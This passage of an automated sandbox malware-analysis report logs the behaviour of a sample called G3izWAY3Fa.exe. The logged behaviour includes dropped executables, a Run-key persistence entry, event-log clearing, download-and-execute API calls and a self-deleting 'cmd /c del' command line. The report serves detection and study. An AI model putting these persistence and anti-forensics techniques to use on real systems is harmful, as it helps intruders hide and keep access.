              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\Temp\ .exeWindow found: window name: SysTabControl32Jump to behavior
              Source: C:\Windows\Temp\ .exeAutomated click: OK
              Source: C:\Windows\Temp\ .exeAutomated click: OK
              Source: C:\Windows\Temp\ .exeAutomated click: OK
              Source: C:\Windows\Temp\ .exeAutomated click: OK
              Source: C:\Windows\Temp\ .exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\Temp\ .exeWindow detected: Number of UI elements: 96
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbg source: .exe, 00000005.00000002.3268806421.0000000003EE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb$ source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1384775691.000000000307F000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000000.1380991211.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268703284.000000000282E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.3268499543.0000000002240000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFF
              Source: v5.exe.0.drStatic PE information: section name: UPX2
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_00408FB0 push eax; ret 2_2_00408FDE
              Source: C:\Windows\Temp\server.exeCode function: 3_2_004046E0 push eax; ret 3_2_0040470E
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10069820 push eax; ret 3_2_1006984E
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100FAA45 push edi; ret 3_2_100FAA46
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10025EF1 push cs; ret 3_2_10025EF2
              Source: C:\Windows\Temp\v5.exeCode function: 4_2_00408FB0 push eax; ret 4_2_00408FDE
              Source: C:\Windows\Temp\ .exeCode function: 5_2_004483B0 push eax; ret 5_2_004483CE
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00447450 push eax; ret 5_2_00447464
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00447450 push eax; ret 5_2_0044748C
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00449957 push ecx; ret 5_2_00449967
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exe
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Windows\Temp\ .exeFile created: \ .exeJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\ .exeJump to dropped file
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\server.exeJump to dropped file
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\v5.exeJump to dropped file
              Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CC\svchsot.exeJump to dropped file
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\ .exeJump to dropped file
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\server.exeJump to dropped file
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Windows\Temp\v5.exeJump to dropped file
              Source: C:\Windows\Temp\server.exeFile created: C:\Windows\XXXXXX05CA35CC\svchsot.exeJump to dropped file
              Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,2_2_0040597D
              Source: C:\Windows\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CCJump to behavior
              Source: C:\Windows\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX05CA35CCJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Deletes itself after installation
              Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
              Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nulJump to behavior
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043D078 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,5_2_0043D078
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A8F0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,5_2_0043A8F0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1000A4D0 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,3_2_1000A4D0
              Source: C:\Windows\Temp\v5.exeCode function: 4_2_00407470 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,socket,inet_addr,sendto,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,CreateProcessA,TerminateProcess,Sleep,CreateProcessA,Sleep,TerminateProcess,Sleep,RtlExitUserThread,wsprintfA,Sleep,send,Sleep,RtlExitUserThread,Sleep,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,CreateProcessA,Sleep,TerminateProcess,wsprintfA,wsprintfA,wsprintfA,wsprintfA,send,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,sendto,socket,sendto,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,wsprintfA,send,Sleep,send,Sleep,RtlExitUserThread,LoadLibraryA,GetProcAddress,wsprintfA,send,wsprintfA,wsprintfA,send,Sleep,RtlExitUserThread,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_00407470
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\v5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\v5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\ .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
